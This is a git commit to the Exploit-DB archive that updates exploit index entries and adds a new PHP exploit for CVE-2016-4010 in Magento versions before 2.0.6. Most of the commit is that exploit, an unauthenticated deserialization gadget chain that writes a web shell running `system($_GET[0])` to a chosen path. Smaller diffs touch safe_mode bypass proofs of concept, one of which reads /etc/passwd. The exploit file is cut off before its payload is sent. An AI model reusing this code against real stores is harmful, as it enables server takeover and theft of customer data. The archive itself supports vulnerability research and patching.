DB: 2016-05-19

1 new exploits

Debian OpenSSL - Predictable PRNG Bruteforce SSH Exploit (Perl)
Debian and Derivatives OpenSSL 0.9.8c-1<= 0.9.8g-9 - Predictable PRNG Bruteforce SSH Exploit (Perl)

Debian OpenSSL - Predictable PRNG Bruteforce SSH Exploit (Ruby)
Debian and Derivatives OpenSSL 0.9.8c-1<= 0.9.8g-9 - Predictable PRNG Bruteforce SSH Exploit (Ruby)

Debian OpenSSL - Predictable PRNG Bruteforce SSH Exploit (Python)
Debian and Derivatives OpenSSL 0.9.8c-1<= 0.9.8g-9 - Predictable PRNG Bruteforce SSH Exploit (Python)
PHP 4.x/5.x MySQL Safe_Mode Filesystem Circumvention Vulnerability (1)
PHP 4.x/5.x MySQL Safe_Mode Filesystem Circumvention Vulnerability (2)
PHP 4.x/5.x MySQL Safe_Mode Filesystem Circumvention Vulnerability (3)
PHP 4.x/5.x MySQL Library - 'Safe_Mode' Filesystem Circumvention Vulnerability (1)
PHP 4.x/5.x MySQL Library - 'Safe_Mode' Filesystem Circumvention Vulnerability (2)
PHP 4.x/5.x MySQL Library - 'Safe_Mode' Filesystem Circumvention Vulnerability (3)

phpliteadmin 1.1 - Multiple Vulnerabilities
phpLiteAdmin 1.1 - Multiple Vulnerabilities

PHP <= 7.0.4/5.5.33 - SNMP Format String Exploit
PHP <= 5.5.33 / <= 7.0.4  - SNMP Format String Exploit

Magento < 2.0.6 - Unauthenticated Arbitrary Unserialize -> Arbitrary Write File
Offensive Security 2016-05-19 05:05:38 +00:00
parent 6dc4d46521
commit feb7c15c11
5 changed files with 562 additions and 14 deletions


@ -5247,7 +5247,7 @@ id,file,description,date,author,platform,type,port
5619,platforms/windows/remote/5619.html,"Microsoft Internet Explorer (Print Table of Links) Cross-Zone Scripting PoC",2008-05-14,"Aviv Raff",windows,remote,0 5619,platforms/windows/remote/5619.html,"Microsoft Internet Explorer (Print Table of Links) Cross-Zone Scripting PoC",2008-05-14,"Aviv Raff",windows,remote,0
5620,platforms/php/webapps/5620.txt,"rgboard <= 3.0.12 - (RFIi/XSS) Multiple Vulnerabilities",2008-05-14,e.wiZz!,php,webapps,0 5620,platforms/php/webapps/5620.txt,"rgboard <= 3.0.12 - (RFIi/XSS) Multiple Vulnerabilities",2008-05-14,e.wiZz!,php,webapps,0
5621,platforms/php/webapps/5621.txt,"Kostenloses Linkmanagementscript - (page_to_include) RFI Vulnerability",2008-05-14,HaCkeR_EgY,php,webapps,0 5621,platforms/php/webapps/5621.txt,"Kostenloses Linkmanagementscript - (page_to_include) RFI Vulnerability",2008-05-14,HaCkeR_EgY,php,webapps,0
5622,platforms/linux/remote/5622.txt,"Debian OpenSSL - Predictable PRNG Bruteforce SSH Exploit (Perl)",2008-05-15,"Markus Mueller",linux,remote,22 5622,platforms/linux/remote/5622.txt,"Debian and Derivatives OpenSSL 0.9.8c-1<= 0.9.8g-9 - Predictable PRNG Bruteforce SSH Exploit (Perl)",2008-05-15,"Markus Mueller",linux,remote,22
5623,platforms/php/webapps/5623.txt,"Kostenloses Linkmanagementscript SQL Injection Vulnerabilities",2008-05-15,"Virangar Security",php,webapps,0 5623,platforms/php/webapps/5623.txt,"Kostenloses Linkmanagementscript SQL Injection Vulnerabilities",2008-05-15,"Virangar Security",php,webapps,0
5624,platforms/php/webapps/5624.txt,"newsmanager 2.0 - (RFI/rfd/SQL/pb) Multiple Vulnerabilities",2008-05-15,GoLd_M,php,webapps,0 5624,platforms/php/webapps/5624.txt,"newsmanager 2.0 - (RFI/rfd/SQL/pb) Multiple Vulnerabilities",2008-05-15,GoLd_M,php,webapps,0
5625,platforms/windows/local/5625.c,"Symantec Altiris Client Service 6.8.378 - Local Privilege Escalation Exploit",2008-05-15,"Alex Hernandez",windows,local,0 5625,platforms/windows/local/5625.c,"Symantec Altiris Client Service 6.8.378 - Local Privilege Escalation Exploit",2008-05-15,"Alex Hernandez",windows,local,0
@ -5257,7 +5257,7 @@ id,file,description,date,author,platform,type,port
5629,platforms/php/webapps/5629.txt,"Web Slider <= 0.6 - Insecure Cookie/Authentication Handling Vulnerability",2008-05-15,t0pP8uZz,php,webapps,0 5629,platforms/php/webapps/5629.txt,"Web Slider <= 0.6 - Insecure Cookie/Authentication Handling Vulnerability",2008-05-15,t0pP8uZz,php,webapps,0
5630,platforms/php/webapps/5630.txt,"Multi-Page Comment System 1.1.0 Insecure Cookie Handling Vulnerability",2008-05-15,t0pP8uZz,php,webapps,0 5630,platforms/php/webapps/5630.txt,"Multi-Page Comment System 1.1.0 Insecure Cookie Handling Vulnerability",2008-05-15,t0pP8uZz,php,webapps,0
5631,platforms/php/webapps/5631.txt,"IMGallery 2.5 Multiply Remote SQL Injection Vulnerabilities",2008-05-15,cOndemned,php,webapps,0 5631,platforms/php/webapps/5631.txt,"IMGallery 2.5 Multiply Remote SQL Injection Vulnerabilities",2008-05-15,cOndemned,php,webapps,0
5632,platforms/linux/remote/5632.rb,"Debian OpenSSL - Predictable PRNG Bruteforce SSH Exploit (Ruby)",2008-05-16,L4teral,linux,remote,22 5632,platforms/linux/remote/5632.rb,"Debian and Derivatives OpenSSL 0.9.8c-1<= 0.9.8g-9 - Predictable PRNG Bruteforce SSH Exploit (Ruby)",2008-05-16,L4teral,linux,remote,22
5633,platforms/asp/webapps/5633.pl,"StanWeb.CMS (default.asp id) Remote SQL Injection Exploit",2008-05-16,JosS,asp,webapps,0 5633,platforms/asp/webapps/5633.pl,"StanWeb.CMS (default.asp id) Remote SQL Injection Exploit",2008-05-16,JosS,asp,webapps,0
5634,platforms/php/webapps/5634.htm,"Zomplog <= 3.8.2 (newuser.php) Arbitrary Add Admin Exploit",2008-05-16,ArxWolf,php,webapps,0 5634,platforms/php/webapps/5634.htm,"Zomplog <= 3.8.2 (newuser.php) Arbitrary Add Admin Exploit",2008-05-16,ArxWolf,php,webapps,0
5635,platforms/php/webapps/5635.pl,"Archangel Weblog 0.90.02 (post_id) SQL Injection Exploit",2008-05-16,Stack,php,webapps,0 5635,platforms/php/webapps/5635.pl,"Archangel Weblog 0.90.02 (post_id) SQL Injection Exploit",2008-05-16,Stack,php,webapps,0
@ -5344,7 +5344,7 @@ id,file,description,date,author,platform,type,port
5717,platforms/asp/webapps/5717.txt,"I-Pos Internet Pay Online Store <= 1.3 Beta SQL Injection Vulnerability",2008-06-01,KnocKout,asp,webapps,0 5717,platforms/asp/webapps/5717.txt,"I-Pos Internet Pay Online Store <= 1.3 Beta SQL Injection Vulnerability",2008-06-01,KnocKout,asp,webapps,0
5718,platforms/windows/dos/5718.pl,"SecurityGateway 1.0.1 (username) Remote Buffer Overflow PoC",2008-06-01,securfrog,windows,dos,0 5718,platforms/windows/dos/5718.pl,"SecurityGateway 1.0.1 (username) Remote Buffer Overflow PoC",2008-06-01,securfrog,windows,dos,0
5719,platforms/php/webapps/5719.pl,"Joomla Component JooBB 0.5.9 - Blind SQL Injection Exploit",2008-06-01,His0k4,php,webapps,0 5719,platforms/php/webapps/5719.pl,"Joomla Component JooBB 0.5.9 - Blind SQL Injection Exploit",2008-06-01,His0k4,php,webapps,0
5720,platforms/linux/remote/5720.py,"Debian OpenSSL - Predictable PRNG Bruteforce SSH Exploit (Python)",2008-06-01,"WarCat team",linux,remote,22 5720,platforms/linux/remote/5720.py,"Debian and Derivatives OpenSSL 0.9.8c-1<= 0.9.8g-9 - Predictable PRNG Bruteforce SSH Exploit (Python)",2008-06-01,"WarCat team",linux,remote,22
5721,platforms/php/webapps/5721.pl,"Joomla Component acctexp <= 0.12.x - BlindSQL Injection Exploit",2008-06-02,His0k4,php,webapps,0 5721,platforms/php/webapps/5721.pl,"Joomla Component acctexp <= 0.12.x - BlindSQL Injection Exploit",2008-06-02,His0k4,php,webapps,0
5722,platforms/php/webapps/5722.txt,"Booby 1.0.1 - Multiple Remote File Inclusion Vulnerabilities",2008-06-02,HaiHui,php,webapps,0 5722,platforms/php/webapps/5722.txt,"Booby 1.0.1 - Multiple Remote File Inclusion Vulnerabilities",2008-06-02,HaiHui,php,webapps,0
5723,platforms/php/webapps/5723.txt,"Joomla Component equotes 0.9.4 - Remote SQL Injection Vulnerability",2008-06-02,His0k4,php,webapps,0 5723,platforms/php/webapps/5723.txt,"Joomla Component equotes 0.9.4 - Remote SQL Injection Vulnerability",2008-06-02,His0k4,php,webapps,0
@ -18544,9 +18544,9 @@ id,file,description,date,author,platform,type,port
21261,platforms/unix/dos/21261.txt,"Tru64 - Malformed TCP Packet Denial of Service Vulnerability",2002-01-31,"Luca Papotti",unix,dos,0 21261,platforms/unix/dos/21261.txt,"Tru64 - Malformed TCP Packet Denial of Service Vulnerability",2002-01-31,"Luca Papotti",unix,dos,0
21262,platforms/linux/dos/21262.txt,"kicq 2.0.0b1 - Invalid ICQ Packet Denial of Service Vulnerability",2002-02-02,"Rafael San Miguel Carrasco",linux,dos,0 21262,platforms/linux/dos/21262.txt,"kicq 2.0.0b1 - Invalid ICQ Packet Denial of Service Vulnerability",2002-02-02,"Rafael San Miguel Carrasco",linux,dos,0
21263,platforms/cgi/remote/21263.txt,"Faq-O-Matic 2.6/2.7 - Cross-Site Scripting Vulnerability",2002-02-04,superpetz,cgi,remote,0 21263,platforms/cgi/remote/21263.txt,"Faq-O-Matic 2.6/2.7 - Cross-Site Scripting Vulnerability",2002-02-04,superpetz,cgi,remote,0
21264,platforms/php/remote/21264.php,"PHP 4.x/5.x MySQL Safe_Mode Filesystem Circumvention Vulnerability (1)",2002-02-03,"Dave Wilson",php,remote,0 21264,platforms/php/remote/21264.php,"PHP 4.x/5.x MySQL Library - 'Safe_Mode' Filesystem Circumvention Vulnerability (1)",2002-02-03,"Dave Wilson",php,remote,0
21265,platforms/php/remote/21265.php,"PHP 4.x/5.x MySQL Safe_Mode Filesystem Circumvention Vulnerability (2)",2002-02-03,anonymous,php,remote,0 21265,platforms/php/remote/21265.php,"PHP 4.x/5.x MySQL Library - 'Safe_Mode' Filesystem Circumvention Vulnerability (2)",2002-02-03,anonymous,php,remote,0
21266,platforms/php/remote/21266.php,"PHP 4.x/5.x MySQL Safe_Mode Filesystem Circumvention Vulnerability (3)",2002-02-03,anonymous,php,remote,0 21266,platforms/php/remote/21266.php,"PHP 4.x/5.x MySQL Library - 'Safe_Mode' Filesystem Circumvention Vulnerability (3)",2002-02-03,anonymous,php,remote,0
21267,platforms/php/webapps/21267.txt,"Subrion CMS 2.2.1 - CSRF Add Admin Exploit",2012-09-12,LiquidWorm,php,webapps,0 21267,platforms/php/webapps/21267.txt,"Subrion CMS 2.2.1 - CSRF Add Admin Exploit",2012-09-12,LiquidWorm,php,webapps,0
21268,platforms/hardware/remote/21268.py,"Sitecom MD-25x - Multiple Vulnerabilitie/ Reverse Root Shell Exploit",2012-09-12,"Mattijs van Ommeren",hardware,remote,0 21268,platforms/hardware/remote/21268.py,"Sitecom MD-25x - Multiple Vulnerabilitie/ Reverse Root Shell Exploit",2012-09-12,"Mattijs van Ommeren",hardware,remote,0
21269,platforms/php/webapps/21269.txt,"Webify eDownloads Cart Arbitrary File Deletion Vulnerability",2012-09-12,JIKO,php,webapps,0 21269,platforms/php/webapps/21269.txt,"Webify eDownloads Cart Arbitrary File Deletion Vulnerability",2012-09-12,JIKO,php,webapps,0
@ -33855,7 +33855,7 @@ id,file,description,date,author,platform,type,port
37512,platforms/hardware/remote/37512.txt,"Barracuda SSL VPN launchAgent.do return-To Parameter XSS",2012-07-18,"Benjamin Kunz Mejri",hardware,remote,0 37512,platforms/hardware/remote/37512.txt,"Barracuda SSL VPN launchAgent.do return-To Parameter XSS",2012-07-18,"Benjamin Kunz Mejri",hardware,remote,0
37513,platforms/hardware/remote/37513.txt,"Barracuda SSL VPN fileSystem.do Multiple Parameter XSS",2012-07-18,"Benjamin Kunz Mejri",hardware,remote,0 37513,platforms/hardware/remote/37513.txt,"Barracuda SSL VPN fileSystem.do Multiple Parameter XSS",2012-07-18,"Benjamin Kunz Mejri",hardware,remote,0
37514,platforms/php/webapps/37514.txt,"WordPress ACF Frontend Display Plugin 2.0.5 - File Upload Vulnerability",2015-07-07,"TUNISIAN CYBER",php,webapps,80 37514,platforms/php/webapps/37514.txt,"WordPress ACF Frontend Display Plugin 2.0.5 - File Upload Vulnerability",2015-07-07,"TUNISIAN CYBER",php,webapps,80
37515,platforms/php/webapps/37515.txt,"phpliteadmin 1.1 - Multiple Vulnerabilities",2015-07-07,hyp3rlinx,php,webapps,80 37515,platforms/php/webapps/37515.txt,"phpLiteAdmin 1.1 - Multiple Vulnerabilities",2015-07-07,hyp3rlinx,php,webapps,80
37516,platforms/hardware/webapps/37516.txt,"Dlink DSL-2750u and DSL-2730u - Authenticated Local File Disclosure",2015-07-07,"SATHISH ARTHAR",hardware,webapps,0 37516,platforms/hardware/webapps/37516.txt,"Dlink DSL-2750u and DSL-2730u - Authenticated Local File Disclosure",2015-07-07,"SATHISH ARTHAR",hardware,webapps,0
37517,platforms/hardware/dos/37517.pl,"INFOMARK IMW-C920W miniupnpd 1.0 - Denial of Service",2015-07-07,"Todor Donev",hardware,dos,1900 37517,platforms/hardware/dos/37517.pl,"INFOMARK IMW-C920W miniupnpd 1.0 - Denial of Service",2015-07-07,"Todor Donev",hardware,dos,1900
37518,platforms/multiple/dos/37518.html,"Arora Browser Remote Denial of Service Vulnerability",2012-07-18,t3rm!n4t0r,multiple,dos,0 37518,platforms/multiple/dos/37518.html,"Arora Browser Remote Denial of Service Vulnerability",2012-07-18,t3rm!n4t0r,multiple,dos,0
@ -35851,7 +35851,7 @@ id,file,description,date,author,platform,type,port
39642,platforms/linux/webapps/39642.txt,"Apache OpenMeetings 1.9.x - 3.1.0 - ZIP File path Traversal",2016-03-31,"Andreas Lindh",linux,webapps,5080 39642,platforms/linux/webapps/39642.txt,"Apache OpenMeetings 1.9.x - 3.1.0 - ZIP File path Traversal",2016-03-31,"Andreas Lindh",linux,webapps,5080
39643,platforms/java/remote/39643.rb,"Apache Jetspeed Arbitrary File Upload",2016-03-31,metasploit,java,remote,8080 39643,platforms/java/remote/39643.rb,"Apache Jetspeed Arbitrary File Upload",2016-03-31,metasploit,java,remote,8080
39644,platforms/multiple/dos/39644.txt,"Wireshark - dissect_pktc_rekey Heap-based Out-of-Bounds Read",2016-03-31,"Google Security Research",multiple,dos,0 39644,platforms/multiple/dos/39644.txt,"Wireshark - dissect_pktc_rekey Heap-based Out-of-Bounds Read",2016-03-31,"Google Security Research",multiple,dos,0
39645,platforms/multiple/remote/39645.php,"PHP <= 7.0.4/5.5.33 - SNMP Format String Exploit",2016-04-01,"Andrew Kramer",multiple,remote,0 39645,platforms/multiple/remote/39645.php,"PHP <= 5.5.33 / <= 7.0.4 - SNMP Format String Exploit",2016-04-01,"Andrew Kramer",multiple,remote,0
39646,platforms/php/webapps/39646.py,"WordPress Advanced Video Plugin 1.0 - Local File Inclusion (LFI)",2016-04-01,"evait security GmbH",php,webapps,80 39646,platforms/php/webapps/39646.py,"WordPress Advanced Video Plugin 1.0 - Local File Inclusion (LFI)",2016-04-01,"evait security GmbH",php,webapps,80
39647,platforms/windows/dos/39647.txt,"Windows Kernel - Bitmap Use-After-Free",2016-04-01,"Nils Sommer",windows,dos,0 39647,platforms/windows/dos/39647.txt,"Windows Kernel - Bitmap Use-After-Free",2016-04-01,"Nils Sommer",windows,dos,0
39648,platforms/windows/dos/39648.txt,"Windows Kernel - NtGdiGetTextExtentExW Out-of-Bounds Memory Read",2016-04-01,"Nils Sommer",windows,dos,0 39648,platforms/windows/dos/39648.txt,"Windows Kernel - NtGdiGetTextExtentExW Out-of-Bounds Memory Read",2016-04-01,"Nils Sommer",windows,dos,0
@ -36023,3 +36023,4 @@ id,file,description,date,author,platform,type,port
39835,platforms/multiple/dos/39835.txt,"Symantec/Norton Antivirus - ASPack Remote Heap/Pool Memory Corruption Vulnerability",2016-05-17,"Google Security Research",multiple,dos,0 39835,platforms/multiple/dos/39835.txt,"Symantec/Norton Antivirus - ASPack Remote Heap/Pool Memory Corruption Vulnerability",2016-05-17,"Google Security Research",multiple,dos,0
39836,platforms/multiple/remote/39836.rb,"Dell SonicWALL Scrutinizer 11.01 methodDetail SQL Injection",2016-05-17,metasploit,multiple,remote,0 39836,platforms/multiple/remote/39836.rb,"Dell SonicWALL Scrutinizer 11.01 methodDetail SQL Injection",2016-05-17,metasploit,multiple,remote,0
39837,platforms/java/webapps/39837.txt,"SAP xMII 15.0 - Directory Traversal",2016-05-17,ERPScan,java,webapps,0 39837,platforms/java/webapps/39837.txt,"SAP xMII 15.0 - Directory Traversal",2016-05-17,ERPScan,java,webapps,0
39838,platforms/php/webapps/39838.php,"Magento < 2.0.6 - Unauthenticated Arbitrary Unserialize -> Arbitrary Write File",2016-05-18,agix,php,webapps,80



@ -1,10 +1,11 @@
<?php
/*
source: http://www.securityfocus.com/bid/4026/info source: http://www.securityfocus.com/bid/4026/info
PHP's 'safe_mode' feature may be used to restrict access to certain areas of a filesystem by PHP scripts. However, a problem has been discovered that may allow an attacker to bypass these restrictions to gain unauthorized access to areas of the filesystem that are restricted when PHP 'safe_mode' is enabled. PHP's 'safe_mode' feature may be used to restrict access to certain areas of a filesystem by PHP scripts. However, a problem has been discovered that may allow an attacker to bypass these restrictions to gain unauthorized access to areas of the filesystem that are restricted when PHP 'safe_mode' is enabled.
In particular, the MySQL client library that ships with PHP fails to properly honor 'safe_mode'. As a result, a user can issue a LOAD DATA statement to read files that reside in restricted areas of the filesystem (as determined by 'safe_mode'). In particular, the MySQL client library that ships with PHP fails to properly honor 'safe_mode'. As a result, a user can issue a LOAD DATA statement to read files that reside in restricted areas of the filesystem (as determined by 'safe_mode').
*/
<?
/* /*
PHP Safe Mode Problem PHP Safe Mode Problem


@ -1,10 +1,11 @@
<?php
/*
source: http://www.securityfocus.com/bid/4026/info source: http://www.securityfocus.com/bid/4026/info
PHP's 'safe_mode' feature may be used to restrict access to certain areas of a filesystem by PHP scripts. However, a problem has been discovered that may allow an attacker to bypass these restrictions to gain unauthorized access to areas of the filesystem that are restricted when PHP 'safe_mode' is enabled. PHP's 'safe_mode' feature may be used to restrict access to certain areas of a filesystem by PHP scripts. However, a problem has been discovered that may allow an attacker to bypass these restrictions to gain unauthorized access to areas of the filesystem that are restricted when PHP 'safe_mode' is enabled.
In particular, the MySQL client library that ships with PHP fails to properly honor 'safe_mode'. As a result, a user can issue a LOAD DATA statement to read files that reside in restricted areas of the filesystem (as determined by 'safe_mode'). In particular, the MySQL client library that ships with PHP fails to properly honor 'safe_mode'. As a result, a user can issue a LOAD DATA statement to read files that reside in restricted areas of the filesystem (as determined by 'safe_mode').
*/
<?php
file_get_contents('/etc/passwd'); file_get_contents('/etc/passwd');


@ -1,10 +1,11 @@
<?php
/*
source: http://www.securityfocus.com/bid/4026/info source: http://www.securityfocus.com/bid/4026/info
PHP's 'safe_mode' feature may be used to restrict access to certain areas of a filesystem by PHP scripts. However, a problem has been discovered that may allow an attacker to bypass these restrictions to gain unauthorized access to areas of the filesystem that are restricted when PHP 'safe_mode' is enabled. PHP's 'safe_mode' feature may be used to restrict access to certain areas of a filesystem by PHP scripts. However, a problem has been discovered that may allow an attacker to bypass these restrictions to gain unauthorized access to areas of the filesystem that are restricted when PHP 'safe_mode' is enabled.
In particular, the MySQL client library that ships with PHP fails to properly honor 'safe_mode'. As a result, a user can issue a LOAD DATA statement to read files that reside in restricted areas of the filesystem (as determined by 'safe_mode'). In particular, the MySQL client library that ships with PHP fails to properly honor 'safe_mode'. As a result, a user can issue a LOAD DATA statement to read files that reside in restricted areas of the filesystem (as determined by 'safe_mode').
*/
<?php
function r($fp, &$buf, $len, &$err) { function r($fp, &$buf, $len, &$err) {
print fread($fp, $len); print fread($fp, $len);

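--- a/platforms/php/webapps/39838.php
+++ b/platforms/php/webapps/39838.php
@@ -0,0 +1,544 @@
+<?php
+// Exploit Title: [CVE-2016-4010] Magento unauthenticated arbitrary unserialize -> arbitrary write file
+// Date: 18/05/206
+// Exploit Author: agix (discovered by NETANEL RUBIN)
+// Vendor Homepage: https://magento.com
+// Version: < 2.0.6
+// CVE : CVE-2016-4010
+// to get a valid guestCartId
+// * add an item in your cart
+// * go to checkout
+// * fill the shipping address stuff and look at the POST request to /rest/default/V1/guest-carts/<guestCartId>/shipping-information
+// (* in the response check the payment method it may vary from checkmo)
+//
+// If you didn\'t provide whereToWrite, it will execute phpinfo to leak path.
+class Magento_Framework_Simplexml_Config_Cache_File extends DataObject
+{
+function __construct($data){
+$this->_data = $data;
+}
+}
+class Credis_Client{
+const TYPE_STRING = 'string';
+const TYPE_LIST = 'list';
+const TYPE_SET = 'set';
+const TYPE_ZSET = 'zset';
+const TYPE_HASH = 'hash';
+const TYPE_NONE = 'none';
+const FREAD_BLOCK_SIZE = 8192;
+/**
+* Socket connection to the Redis server or Redis library instance
+* @var resource|Redis
+*/
+protected $redis;
+protected $redisMulti;
+/**
+* Host of the Redis server
+* @var string
+*/
+protected $host;
+/**
+* Port on which the Redis server is running
+* @var integer
+*/
+protected $port;
+/**
+* Timeout for connecting to Redis server
+* @var float
+*/
+protected $timeout;
+/**
+* Timeout for reading response from Redis server
+* @var float
+*/
+protected $readTimeout;
+/**
+* Unique identifier for persistent connections
+* @var string
+*/
+protected $persistent;
+/**
+* @var bool
+*/
+protected $closeOnDestruct = TRUE;
+/**
+* @var bool
+*/
+protected $connected = TRUE;
+/**
+* @var bool
+*/
+protected $standalone;
+/**
+* @var int
+*/
+protected $maxConnectRetries = 0;
+/**
+* @var int
+*/
+protected $connectFailures = 0;
+/**
+* @var bool
+*/
+protected $usePipeline = FALSE;
+/**
+* @var array
+*/
+protected $commandNames;
+/**
+* @var string
+*/
+protected $commands;
+/**
+* @var bool
+*/
+protected $isMulti = FALSE;
+/**
+* @var bool
+*/
+protected $isWatching = FALSE;
+/**
+* @var string
+*/
+protected $authPassword;
+/**
+* @var int
+*/
+protected $selectedDb = 0;
+/**
+* Aliases for backwards compatibility with phpredis
+* @var array
+*/
+protected $wrapperMethods = array('delete' => 'del', 'getkeys' => 'keys', 'sremove' => 'srem');
+/**
+* @var array
+*/
+protected $renamedCommands;
+/**
+* @var int
+*/
+protected $requests = 0;
+public function __construct($resource) {
+$this->redis = new Magento_Sales_Model_Order_Payment_Transaction($resource);
+}
+}
+class DataObject
+{
+/**
+* Object attributes
+*
+* @var array
+*/
+protected $_data = [];
+/**
+* Setter/Getter underscore transformation cache
+*
+* @var array
+*/
+protected static $_underscoreCache = [];
+}
+abstract class AbstractModel2 extends DataObject
+{
+/**
+* Prefix of model events names
+*
+* @var string
+*/
+protected $_eventPrefix = 'core_abstract';
+/**
+* Parameter name in event
+*
+* In observe method you can use $observer->getEvent()->getObject() in this case
+*
+* @var string
+*/
+protected $_eventObject = 'object';
+/**
+* Name of object id field
+*
+* @var string
+*/
+protected $_idFieldName = 'id';
+/**
+* Data changes flag (true after setData|unsetData call)
+* @var $_hasDataChange bool
+*/
+protected $_hasDataChanges = false;
+/**
+* Original data that was loaded
+*
+* @var array
+*/
+protected $_origData;
+/**
+* Object delete flag
+*
+* @var bool
+*/
+protected $_isDeleted = false;
+/**
+* Resource model instance
+*
+* @var \Magento\Framework\Model\ResourceModel\Db\AbstractDb
+*/
+protected $_resource;
+/**
+* Resource collection
+*
+* @var \Magento\Framework\Model\ResourceModel\Db\Collection\AbstractCollection
+*/
+protected $_resourceCollection;
+/**
+* Name of the resource model
+*
+* @var string
+*/
+protected $_resourceName;
+/**
+* Name of the resource collection model
+*
+* @var string
+*/
+protected $_collectionName;
+/**
+* Model cache tag for clear cache in after save and after delete
+*
+* When you use true - all cache will be clean
+*
+* @var string|array|bool
+*/
+protected $_cacheTag = false;
+/**
+* Flag which can stop data saving after before save
+* Can be used for next sequence: we check data in _beforeSave, if data are
+* not valid - we can set this flag to false value and save process will be stopped
+*
+* @var bool
+*/
+protected $_dataSaveAllowed = true;
+/**
+* Flag which allow detect object state: is it new object (without id) or existing one (with id)
+*
+* @var bool
+*/
+protected $_isObjectNew = null;
+/**
+* Validator for checking the model state before saving it
+*
+* @var \Zend_Validate_Interface|bool|null
+*/
+protected $_validatorBeforeSave = null;
+/**
+* Application Event Dispatcher
+*
+* @var \Magento\Framework\Event\ManagerInterface
+*/
+protected $_eventManager;
+/**
+* Application Cache Manager
+*
+* @var \Magento\Framework\App\CacheInterface
+*/
+protected $_cacheManager;
+/**
+* @var \Magento\Framework\Registry
+*/
+protected $_registry;
+/**
+* @var \Psr\Log\LoggerInterface
+*/
+protected $_logger;
+/**
+* @var \Magento\Framework\App\State
+*/
+protected $_appState;
+/**
+* @var \Magento\Framework\Model\ActionValidator\RemoveAction
+*/
+protected $_actionValidator;
+/**
+* Array to store object's original data
+*
+* @var array
+*/
+protected $storedData = [];
+}
+abstract class AbstractExtensibleModel extends AbstractModel2
+{
+protected $extensionAttributesFactory;
+/**
+* @var \Magento\Framework\Api\ExtensionAttributesInterface
+*/
+protected $extensionAttributes;
+/**
+* @var AttributeValueFactory
+*/
+protected $customAttributeFactory;
+/**
+* @var string[]
+*/
+protected $customAttributesCodes = null;
+/**
+* @var bool
+*/
+protected $customAttributesChanged = false;
+}
+abstract class AbstractModel extends AbstractExtensibleModel
+{
+}
+class Magento_Sales_Model_Order_Payment_Transaction extends AbstractModel
+{
+/**#@+
+* Supported transaction types
+* @var string
+*/
+const TYPE_PAYMENT = 'payment';
+const TYPE_ORDER = 'order';
+const TYPE_AUTH = 'authorization';
+const TYPE_CAPTURE = 'capture';
+const TYPE_VOID = 'void';
+const TYPE_REFUND = 'refund';
+/**#@-*/
+/**
+* Raw details key in additional info
+*/
+const RAW_DETAILS = 'raw_details_info';
+/**
+* Order instance
+*
+* @var \Magento\Sales\Model\Order\Payment
+*/
+protected $_order = null;
+/**
+* Parent transaction instance
+* @var \Magento\Sales\Model\Order\Payment\Transaction
+*/
+protected $_parentTransaction = null;
+/**
+* Child transactions, assoc array of transaction_id => instance
+*
+* @var array
+*/
+protected $_children = null;
+/**
+* Child transactions, assoc array of txn_id => instance
+* Filled only in case when all child transactions have txn_id
+* Used for quicker search of child transactions using isset() as opposite to foreaching $_children
+*
+* @var array
+*/
+protected $_identifiedChildren = null;
+/**
+* Whether to perform automatic actions on transactions, such as auto-closing and putting as a parent
+*
+* @var bool
+*/
+protected $_transactionsAutoLinking = true;
+/**
+* Whether to throw exceptions on different operations
+*
+* @var bool
+*/
+protected $_isFailsafe = true;
+/**
+* Whether transaction has children
+*
+* @var bool
+*/
+protected $_hasChild = null;
+/**
+* Event object prefix
+*
+* @var string
+* @see \Magento\Framework\Model\AbstractModel::$_eventPrefix
+*/
+protected $_eventPrefix = 'sales_order_payment_transaction';
+/**
+* Event object prefix
+*
+* @var string
+* @see \Magento\Framework\Model\AbstractModel::$_eventObject
+*/
+protected $_eventObject = 'order_payment_transaction';
+/**
+* Order website id
+*
+* @var int
+*/
+protected $_orderWebsiteId = null;
+/**
+* @var \Magento\Sales\Model\OrderFactory
+*/
+protected $_orderFactory;
+/**
+* @var \Magento\Framework\Stdlib\DateTime\DateTimeFactory
+*/
+protected $_dateFactory;
+/**
+* @var TransactionFactory
+*/
+protected $_transactionFactory;
+/**
+* @var \Magento\Sales\Api\OrderPaymentRepositoryInterface
+*/
+protected $orderPaymentRepository;
+/**
+* @var \Magento\Sales\Api\OrderRepositoryInterface
+*/
+protected $orderRepository;
+/**
+* @param \Magento\Framework\Model\Context $context
+* @param \Magento\Framework\Registry $registry
+* @param \Magento\Framework\Api\ExtensionAttributesFactory $extensionFactory
+* @param AttributeValueFactory $customAttributeFactory
+* @param \Magento\Sales\Model\OrderFactory $orderFactory
+* @param \Magento\Framework\Stdlib\DateTime\DateTimeFactory $dateFactory
+* @param TransactionFactory $transactionFactory
+* @param \Magento\Framework\Model\ResourceModel\AbstractResource $resource
+* @param \Magento\Framework\Data\Collection\AbstractDb $resourceCollection
+* @param array $data
+* @SuppressWarnings(PHPMD.ExcessiveParameterList)
+*/
+public function __construct($resource) {
+$this->_resource = $resource;
+}
+}
+class Magento_Framework_DB_Transaction{
+protected $_objects = [];
+/**
+* Transaction objects array with alias key
+*
+* @var array
+*/
+protected $_objectsByAlias = [];
+/**
+* Callbacks array.
+*
+* @var array
+*/
+protected $_beforeCommitCallbacks = ["phpinfo"];
+}
+if(count($argv) < 3){
+echo 'Usage: '.$argv[0].' <magento_uri> <guestCartId> (whereToWrite)'.chr(0x0a);
+echo 'To get a valid guestCartId'.chr(0x0a);
+echo '* add an item in your cart'.chr(0x0a);
+echo '* go to checkout'.chr(0x0a);
+echo '* fill the shipping address stuff and look at the POST request to /rest/default/V1/guest-carts/<guestCartId>/shipping-information'.chr(0x0a);
+echo '(* in the response check the payment method it may vary from "checkmo")'.chr(0x0a).chr(0x0a);
+echo 'If you didn\'t provide whereToWrite, it will execute phpinfo to leak path.'.chr(0x0a);
+exit();
+}
+if(count($argv) === 4){
+$data = [];
+$data['is_allowed_to_save'] = True;
+$data['stat_file_name'] = $argv[3];
+$data['components'] = '<?php system($_GET[0]); ?>';
+$resource = new Magento_Framework_Simplexml_Config_Cache_File($data);
+}
+else{
+$resource = new Magento_Framework_DB_Transaction();
+}
+$redis = new Credis_Client($resource);
+$serialized = serialize($redis);
+$payload = json_decode('{"paymentMethod":{"method":"checkmo", "additional_data":{"additional_information":""}}, "email": "valid@magento.com"}');
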